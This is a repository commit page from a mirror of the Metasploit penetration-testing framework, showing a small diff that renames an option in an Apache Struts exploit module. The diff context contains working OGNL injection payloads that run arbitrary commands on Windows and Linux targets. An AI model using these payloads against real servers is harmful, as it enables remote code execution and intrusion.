infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Use of TARGETURI

unstable
jvazquez-r7 2012-06-03 22:36:23 +02:00
parent 659b030269
commit b53a1396fc
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
View File

@ -63,14 +63,14 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
Opt::RPORT(8080),
OptString.new('URI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', ""]),
OptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', ""]),
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
], self.class)
end
def execute_command(cmd, opts = {})
uri = String.new(datastore['URI'])
uri = String.new(datastore['TARGETURI'])
uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\"))%2b'") if target['Platform'] == 'win'
uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\".split(\"@\")))%2b'") if target['Platform'] == 'linux'
uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))